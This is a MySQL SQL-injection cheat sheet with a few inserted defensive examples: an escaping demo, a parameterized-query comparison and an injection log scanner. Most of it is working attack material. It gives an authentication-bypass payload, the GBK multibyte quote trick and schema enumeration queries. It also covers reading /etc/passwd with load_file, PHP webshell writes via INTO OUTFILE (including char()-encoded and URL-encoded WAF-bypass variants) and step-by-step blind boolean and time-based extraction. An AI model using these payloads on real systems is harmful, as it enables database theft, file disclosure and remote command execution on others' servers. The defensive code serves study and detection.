Connecting

mysql -h xx -u root
(add -p if a password is needed. Use 127.0.0.1, not localhost, so the client connects over TCP rather than the local socket; then use -P to specify the port)

Querying / Exploiting

For MySQL/MSSQL: select @@version returns the version; other DBMSs will error, which itself helps fingerprint the backend.

%09 (tab) can be used in case the space character is filtered. Inline comments can also be used as separators.

\xBF' (URL-encoded %bf%27) creates a single quote that won't be escaped properly (only when the connection character set is GBK). Example: admin%bf%27%20or%201=1%20--+
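Why the GBK trick defeats byte-oriented escaping, and what a charset-aware fix looks like, as an added example that is not part of the original cheat sheet. It models addslashes-style escaping in pure Python with no database involved; the byte inputs are constructed here. The proper remedy in a real application is a parameterized query, or at least telling the driver the connection charset (so its escaping function knows the encoding) instead of switching it with a bare SET NAMES.

```python
# Added example: models byte-oriented escaping on a GBK connection.
# No real database involved; the inputs below are constructed.


def naive_escape(raw: bytes) -> bytes:
    """addslashes-style escaping done byte by byte, unaware of the charset:
    put a backslash (0x5C) before every ' " and \\ byte."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_is_unescaped_gbk(escaped: bytes) -> bool:
    """Decode the escaped bytes the way a GBK-configured server does and report
    whether a bare single quote survives. 0xBF 0x5C is a valid two-byte GBK
    character, so the inserted backslash is swallowed as a trail byte."""
    text = escaped.decode("gbk", errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":        # a live backslash escapes the next character
            i += 2
            continue
        if text[i] == "'":         # a quote with no live backslash before it
            return True
        i += 1
    return False


def charset_aware_escape(raw: bytes, charset: str = "gbk"):
    """Hardened variant: decode first (strictly), then escape in code-point
    space. A dangling lead byte such as 0xBF before a quote is not a valid
    sequence and is rejected (None) instead of reaching the database."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


if __name__ == "__main__":
    payload = b"admin\xbf' or 1=1 -- "   # shape of the %bf%27 payload above
    escaped = naive_escape(payload)
    print("naive escape :", escaped, "quote leaks:", quote_is_unescaped_gbk(escaped))
    print("charset-aware:", charset_aware_escape(payload))
```

Run it and the naive path reports a leaked quote while the charset-aware path refuses the input; the same input containing only ASCII is escaped correctly by both, which is why the bug is invisible until a multibyte connection charset is in use.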

sleep(5) delays the response by 5 seconds

Check how many columns there are: order by x, increasing x until an error occurs; the last value that works is the number of columns.

Concatenating (concat joins 2 values together; group_concat joins all values of one column into a single string): concat(name1,":",name2) or group_concat(column_name)

To comment, use xx-- 
(with a trailing space after --, important)
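The payload shape above (a closing quote, an always-true condition and a trailing comment) run against a string-built query and against its parameterized counterpart, as an added example that is not part of the original cheat sheet. It uses an in-memory SQLite database as an offline stand-in for MySQL; the table, rows and credentials are constructed.

```python
import sqlite3

# Added example; in-memory SQLite stands in for MySQL. Table and rows are constructed.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, name text, pw text)")
    conn.executemany(
        "insert into users (name, pw) values (?, ?)",
        [("admin", "s3cret"), ("alice", "pw1"), ("bob", "pw2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, pw: str) -> list:
    """Query built by string formatting: whatever the client sends becomes SQL.
    A quote closes the literal, 'or 1=1' widens the WHERE clause and the
    comment discards the password check entirely."""
    sql = f"select name from users where name = '{name}' and pw = '{pw}'"
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn: sqlite3.Connection, name: str, pw: str) -> list:
    """Hardened form: placeholders keep the SQL text fixed; the driver passes
    the values separately, so the quote and comment are just characters."""
    sql = "select name from users where name = ? and pw = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, pw)))


if __name__ == "__main__":
    db = make_db()
    attacker_name = "admin' or 1=1 -- "   # same shape as the payload above
    print("vulnerable    :", login_vulnerable(db, attacker_name, "wrong"))
    print("parameterized :", login_parameterized(db, attacker_name, "wrong"))
    print("legit, param  :", login_parameterized(db, "admin", "s3cret"))
```

One difference from MySQL worth knowing when reading logs: SQLite accepts `--` with no trailing space, whereas MySQL requires whitespace after `--`, which is why the cheat sheet writes `-- ` or the URL-encoded `--+` (the `+` decodes to a space).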

Show all databases: select schema_name from information_schema.schemata;
OR show databases;
Show the current database: select database()

Show the table names and which database they belong to, for a database called xx: select table_name, table_schema from information_schema.tables where table_schema='xx'

Show the column names for a table named yy: select column_name,table_schema from information_schema.columns where table_name='yy'

Finally, to retrieve the data, use select bb, cc from xx.yy

See which user is logged in: select user()

Check if a user has the SUPER privilege: select super_priv from mysql.user where user="xx"

Check privileges in detail: select grantee, privilege_type from information_schema.user_privileges

Read a file from the OS: select load_file("/etc/passwd")
(Can attempt to load the current PHP page to disclose sensitive info using a default path like /var/www/html/xx.php.) USE DOUBLE SLASHES FOR WINDOWS PATHS IF IT FAILS

Check secure_file_priv: SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
(On MySQL 5.7 and later information_schema.global_variables is deprecated/removed; show variables like 'secure_file_priv' works everywhere.)
(Empty = can read/write anywhere. A folder name = can only read/write inside that folder. NULL = can read/write nowhere.)

Write a file to the OS (requires the FILE privilege, secure_file_priv not restricting the path, and the MySQL server process having write access to the target directory): select "xxx" into outfile "/var/html/www/test.php"
(c:/xampp/htdocs/ can be tried too) USE DOUBLE SLASHES FOR WINDOWS PATHS IF IT FAILS

For example, to write a webshell, use
select "", "<?php system($_REQUEST[0]); ?>","" into outfile "/var/www/html/test.php"

One example of a full webshell write to Windows (bypassing WAF/encoding filters):
UNION SELECT char(60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,82,69,81,85,69,83,84,91,48,93,41,59,32,63,62) INTO OUTFILE "C:\\wamp\\www\\PHP\\shell1.php"

Another webshell example, tested on MariaDB, with its URL-encoded version:
Text: ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' --
Encoded: %27+UNION+SELECT+%28%22%3C%3Fphp+echo+passthru%28%24_GET%5B%27cmd%27%5D%29%3B%22%29+INTO+OUTFILE+%27C%3A%2Fxampp%2Fhtdocs%2Fcmd.php%27+--+

Blind boolean-based: first establish the number of columns (order by x / union select null,null,...). Once established, use the following (e.g. if there are 3 columns) to get the database name: union select null,null,null where database() like '%';--
then union select null,null,null where database() like 'a%';--
and keep going letter by letter until you have the full database name.
To get a table name, use union select null,null,null from information_schema.tables where table_schema = 'dbname' and table_name like 'a%';--
Finally, to get a column name, use union select null,null,null from information_schema.columns where table_schema='dbname' and table_name='tablename' and column_name like 'a%';--
To exclude columns already found (since there are multiple columns), use union select null,null,null from information_schema.columns where table_schema='dbname' and table_name='tablename' and column_name like 'a%' and column_name!='notthis';--
After getting all the details, use the following to extract the data: union select 1,2,3 from dbname.tablename where columnname like 'a%';--
Repeat for the other column names.

Blind time-based: almost the same as blind boolean-based. First establish the number of columns while setting one of them to sleep(5), adding columns until you get a noticeably longer response time, which means that is the correct number of columns (a wrong count errors immediately, so sleep never runs). Example: union select sleep(5),null;-- . After that, follow the blind boolean-based steps.
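A defender's counterpart to the boolean- and time-based procedures above, as an added example that is not from the original cheat sheet: a small log scanner that URL-decodes request paths, folds the %09 / + / inline-comment spacing tricks back into single spaces, tags the signatures this page lists (union select, information_schema or database() enumeration, sleep, load_file / into outfile, order by probing, the multibyte-quote trick) and flags clients that send many such requests, which is what blind extraction looks like from the server side. The access-log lines are constructed and reuse the payload shapes shown on this page; the signature list is a starting point for detection, not a complete filter.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, abridged).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=1%27%20order%20by%203--+ HTTP/1.1" 500 0
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /item.php?id=1%27%09union%09select%09null,null,null%09where%09database()%09like%09%27a%25%27;--+ HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /item.php?id=1%27%09union%09select%09null,null,null%09where%09database()%09like%09%27b%25%27;--+ HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /item.php?id=1+union+select+sleep(5),null--+ HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:55:44 +0000] "GET /login.php?user=admin%bf%27%20or%201=1%20--+&pw=x HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:45 +0000] "GET /item.php?id=2 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures are matched against the normalized (decoded, space-folded, lower-cased) path.
SIGNATURES = [
    ("union_select",  re.compile(r"\bunion (all )?select\b")),
    ("schema_enum",   re.compile(r"\binformation_schema\.|\bschema_name\b|\bdatabase\(\)")),
    ("time_delay",    re.compile(r"\bsleep\(|\bbenchmark\(")),
    ("file_access",   re.compile(r"\bload_file\(|\binto (out|dump)file\b")),
    ("column_probe",  re.compile(r"\border by \d+")),
    ("boolean_probe", re.compile(r"\blike '[^']*%'")),
]
# The GBK trick only shows in the raw bytes: a high lead byte directly before %27.
MULTIBYTE_QUOTE = re.compile(r"%[89a-f][0-9a-f]%27", re.IGNORECASE)


def normalize(path: str) -> str:
    """URL-decode twice (double-encoded payloads), turn /**/ and any
    whitespace substitute (%09, %0a, +) into one space, lower-case."""
    decoded = unquote_plus(unquote_plus(path)).replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded).lower()


def analyze(log_text: str) -> list:
    """Return one finding per request that matches at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path = m.group("path")
        norm = normalize(raw_path)
        tags = [name for name, rx in SIGNATURES if rx.search(norm)]
        if MULTIBYTE_QUOTE.search(raw_path):
            tags.append("multibyte_quote")
        if tags:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "path": raw_path, "tags": tags})
    return findings


def flag_clients(findings: list, threshold: int = 3) -> dict:
    """Blind extraction needs many near-identical requests (one per guessed
    character); report sources whose matching-request count reaches threshold."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["tags"], h["path"])
    print("flagged:", flag_clients(hits))
```

Two design points: decoding happens before matching so that %09 and `+` cannot hide keywords, and the multibyte check runs on the raw path because the decoder replaces the lone 0xBF byte before any string-level regex could see it. Pairing the per-client count with the 500 status on the first probe (the order by overshoot) and the response-time outlier on the sleep request gives a much stronger signal than any single signature.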